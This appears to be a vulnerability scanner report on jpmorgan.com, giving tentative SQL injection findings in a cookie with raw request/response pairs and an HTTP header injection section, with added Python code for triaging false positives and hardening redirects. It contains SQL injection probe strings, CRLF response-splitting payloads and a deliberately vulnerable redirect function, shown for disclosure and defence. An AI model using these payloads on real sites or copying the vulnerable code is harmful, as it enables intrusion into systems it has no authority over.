1.1. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx [ARPT cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan/investbk/solutions/fixedincome/fx

Issue detail

The ARPT cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ARPT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO'%20and%201%3d1--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response 1

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:30:02 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.21-cws7214CKJKQ; path=/
Set-Cookie: JpmcSession=Vpm1TcyhnGmWvLxjgChCvgjSjfDWtgbgfVg418dLhGwKyLRfT7S2!1696421816; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 61889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page_id: 1159296860718 -->


   
   
       
       
   
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


   <title>Foreign Exchange | J.P. Morgan</title>



   <META NAME="jpmc_lob" CONTENT="Investment Bank" />





   <META NAME="keywords" CONTENT="fx, foreign exchange, currency, morgan direct" />


<meta name="google-site-verification" content="yHbvL6U-Rd7KWvEPHU2xqanjwmr9JqCEKUFACv7pz78" />

<script type="text/javascript">

   var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-20028469-1']);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text' + '/' + 'javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com' + '/' + 'ga.js';
       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();

</script>



   
       <META NAME="ROBOTS" CONTENT="index,follow,NOODP">
       <META NAME="GOOGLEBOT" CONTENT="NOODP">
   



<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691238&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691266&pagena
...[SNIP]...

Request 2

GET /pages/jpmorgan/investbk/solutions/fixedincome/fx?source=megamenu HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO'%20and%201%3d2--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response 2

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:30:03 GMT
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 61889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

<!-- page_id: 1159296860718 -->


   
   
       
       
   
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


   <title>Foreign Exchange | J.P. Morgan</title>



   <META NAME="jpmc_lob" CONTENT="Investment Bank" />





   <META NAME="keywords" CONTENT="fx, foreign exchange, currency, morgan direct" />


<meta name="google-site-verification" content="yHbvL6U-Rd7KWvEPHU2xqanjwmr9JqCEKUFACv7pz78" />

<script type="text/javascript">

   var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-20028469-1']);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text' + '/' + 'javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com' + '/' + 'ga.js';
       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();

</script>



   
       <META NAME="ROBOTS" CONTENT="index,follow,NOODP">
       <META NAME="GOOGLEBOT" CONTENT="NOODP">
   



<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691238&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1153920691266&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?
...[SNIP]...

1.2. http://www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594 [ARPT cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.jpmorgan.com
Path:   /tss/General/ACH_Fraud_Solutions/1159383343594

Issue detail

The ARPT cookie appears to be vulnerable to SQL injection attacks. The payloads 12195430'%20or%201%3d1--%20 and 12195430'%20or%201%3d2--%20 were each submitted in the ARPT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws are often unreliable and prone to false positives. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance both responses carry the same Content-Length (104714); the visible difference is confined to the response headers (Response 1 adds a Cache-Control header, issues a new JpmcSession and returns a different ARPT value), which is at least as consistent with the server discarding a cookie value it does not recognise and starting a fresh session as with a SQL query being altered. Nothing shown here establishes that the ARPT value reaches a database.

Request 1

GET /tss/General/ACH_Fraud_Solutions/1159383343594 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO12195430'%20or%201%3d1--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:33:52 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS155.180.188.20CKOML; path=/
Set-Cookie: JpmcSession=ZWHvTcpQ0K8mgj7Wrpm6YpZPYh214QkpT1Kdq8zHDkfGXngqWGHw!-779951483; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 104714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />

   
   <META name="jpmc_lob" content="Treasury Services">



<TITLE>J.P. Morgan | ACH Fraud Solutions</TITLE>




<META NAME="robots" CONTENT="INDEX,FOLLOW"/>


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<l
...[SNIP]...

Request 2

GET /tss/General/ACH_Fraud_Solutions/1159383343594 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO12195430'%20or%201%3d2--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:56:00 GMT
Date: Tue, 12 Jul 2011 15:33:57 GMT
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 104714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />

   
   <META name="jpmc_lob" content="Treasury Services">



<TITLE>J.P. Morgan | ACH Fraud Solutions</TITLE>




<META NAME="robots" CONTENT="INDEX,FOLLOW"/>


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232946&pagename=JPM_redesign%2FJPM_Stylesheet_C%2
...[SNIP]...

1.3. http://www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254 [ARPT cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.jpmorgan.com
Path:   /tss/Product_A-Z/Products_and_Solutions/1104848729254

Issue detail

The ARPT cookie appears to be vulnerable to SQL injection attacks. The payloads 84051685'%20or%201%3d1--%20 and 84051685'%20or%201%3d2--%20 were each submitted in the ARPT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws are often unreliable and prone to false positives. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. As in 1.2, both responses here have the same Content-Length (106611) and differ only in headers (Cache-Control, a new JpmcSession, a different ARPT value), so the scanner's "different responses" signal rests on volatile session headers rather than on page content.
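The triage step that findings 1.2 and 1.3 call for can be mechanised. The following is an added example, not part of the scanner report or of any code belonging to the sites scanned: it parses two raw HTTP responses and says whether they differ in status, in body, in headers that should be stable, or only in headers that change on every request. The RESPONSE_1/RESPONSE_2 pair is constructed from the header lines shown for finding 1.2 (the bodies are short placeholders standing in for the two 104714-byte pages, which had identical lengths); the BOOL_TRUE/BOOL_FALSE pair is constructed to show what a genuine boolean-based difference looks like. The VOLATILE header set and all function names are this example's own choices.

```python
"""Triage helper for difference-based SQL injection findings (added example)."""

# Headers whose values legitimately change between two otherwise identical
# requests; a difference confined to these says nothing about a SQL query.
VOLATILE = {"date", "set-cookie", "cache-control", "expires", "keep-alive", "connection"}

# Constructed pair modelled on the headers shown for finding 1.2. The body is a
# placeholder for the two 104714-byte pages, whose lengths were identical.
BODY_1_2 = "<html><head><title>J.P. Morgan | ACH Fraud Solutions</title></head></html>"
RESPONSE_1 = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT\r\n"
    "Date: Tue, 12 Jul 2011 15:33:52 GMT\r\n"
    'Cache-Control: no-cache="set-cookie"\r\n'
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Set-Cookie: ARPT=NKOJWQS155.180.188.20CKOML; path=/\r\n"
    "Set-Cookie: JpmcSession=ZWHvTcpQ0K8mgj7Wrpm6YpZPYh214QkpT1Kdq8zHDkfGXngqWGHw!-779951483; path=/\r\n"
    "Content-Length: 104714\r\n"
    "\r\n" + BODY_1_2
)
RESPONSE_2 = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:56:00 GMT\r\n"
    "Date: Tue, 12 Jul 2011 15:33:57 GMT\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/\r\n"
    "Content-Length: 104714\r\n"
    "\r\n" + BODY_1_2
)

# Constructed pair showing a real boolean-based signal: the "' or 1=1" branch
# returns rows, the "' or 1=2" branch returns none, and the body changes.
BOOL_TRUE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<p>3 results</p>"
BOOL_FALSE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<p>0 results</p>"


def parse_response(raw: str):
    """Split a raw response into (status line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def stable_headers(headers):
    """Headers that should not change between two otherwise identical requests."""
    return sorted(h for h in headers if h[0] not in VOLATILE)


def classify_difference(raw_a: str, raw_b: str) -> str:
    """Report the most meaningful kind of difference between two responses."""
    status_a, headers_a, body_a = parse_response(raw_a)
    status_b, headers_b, body_b = parse_response(raw_b)
    if status_a != status_b:
        return "status"
    if body_a != body_b:
        return "body"
    if stable_headers(headers_a) != stable_headers(headers_b):
        return "stable-headers"
    if sorted(headers_a) != sorted(headers_b):
        return "volatile-headers-only"
    return "identical"


def likely_false_positive(raw_a: str, raw_b: str) -> bool:
    """Only status or body differences justify a manual SQLi follow-up."""
    return classify_difference(raw_a, raw_b) in ("identical", "volatile-headers-only")


if __name__ == "__main__":
    print("finding 1.2 pair:", classify_difference(RESPONSE_1, RESPONSE_2))
    print("boolean pair:    ", classify_difference(BOOL_TRUE, BOOL_FALSE))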

Request 1

GET /tss/Product_A-Z/Products_and_Solutions/1104848729254 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO84051685'%20or%201%3d1--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:33:40 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS155.180.188.20CKOML; path=/
Set-Cookie: JpmcSession=CyQnTcpJpNkFpTTFdcJqwczNxhlLDYQhV8h2vn0tTfgv5pQvqwTr!-779951483; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 106611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />

   
   <META name="jpmc_lob" content="Treasury Services">



<TITLE>J.P. Morgan | Treasury Services Product A-Z Index</TITLE>




<META NAME="robots" CONTENT="INDEX,FOLLOW"/>


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232946&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_
...[SNIP]...

Request 2

GET /tss/Product_A-Z/Products_and_Solutions/1104848729254 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO84051685'%20or%201%3d2--%20; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:33:43 GMT
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 106611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=iso-8859-1" />

   
   <META name="jpmc_lob" content="Treasury Services">



<TITLE>J.P. Morgan | Treasury Services Product A-Z Index</TITLE>




<META NAME="robots" CONTENT="INDEX,FOLLOW"/>


<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232932&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232960&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232974&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232946&pagename=JPM_redesign%2FJPM_Stylesheet_C%2FStylesheet_Template' type="text/css" />
<link rel="stylesheet" media="screen" href='/cm/Satellite?c=JPM_Stylesheet_C&cid=1226851232988&pagename=JP
...[SNIP]...

2. HTTP header injection
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
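The remediation above reduces to one check applied before any request-derived value reaches a header. The following is an added example, not code from ad.doubleclick.net, locator.chase.com or any other site in this report: build_redirect_vulnerable is a constructed stand-in for an endpoint that URL-decodes a path segment and concatenates it into Location (the behaviour observed in findings 2.1 to 2.5), and build_redirect_hardened is the same endpoint with the control-character check from the remediation text. PAYLOAD_2_1 is the payload from finding 2.1; SPLIT_PAYLOAD is constructed to show the second effect the background describes, an empty line that ends the headers and turns the rest of the injection into a response body. The host static.2mdn.net is taken from the Location header in finding 2.1; everything else is this example's own.

```python
"""HTTP header injection: vulnerable vs hardened redirect construction (added example)."""
from urllib.parse import unquote

PAYLOAD_2_1 = "8ca46%0d%0aae875a6483a"  # payload from finding 2.1
# Constructed payload: CRLF CRLF ends the header block, so what follows is body.
SPLIT_PAYLOAD = "x%0d%0aContent-Length:%2025%0d%0a%0d%0a<script>alert(1)</script>"


def build_redirect_vulnerable(segment: str) -> bytes:
    """The flaw: decode the segment and concatenate it straight into Location."""
    target = "http://static.2mdn.net/" + unquote(segment)
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: {target}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    ).encode("utf-8")


def header_safe(value: str) -> str:
    """Reject any control character (ASCII < 0x20, plus DEL), per the remediation text."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control character in header value")
    return value


def build_redirect_hardened(segment: str) -> bytes:
    """Same redirect, but the decoded segment is validated before it reaches the header."""
    target = "http://static.2mdn.net/" + header_safe(unquote(segment))
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: {target}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    ).encode("utf-8")


def hardened_accepts(segment: str) -> bool:
    """True if the hardened builder lets the segment through."""
    try:
        build_redirect_hardened(segment)
        return True
    except ValueError:
        return False


def header_names(response: bytes) -> list:
    """Header names as a lenient receiver sees them: split on CRLF up to the first blank line."""
    head = response.split(b"\r\n\r\n", 1)[0]
    names = []
    for line in head.split(b"\r\n")[1:]:
        names.append(line.partition(b":")[0].decode("utf-8"))
    return names


def response_body(response: bytes) -> bytes:
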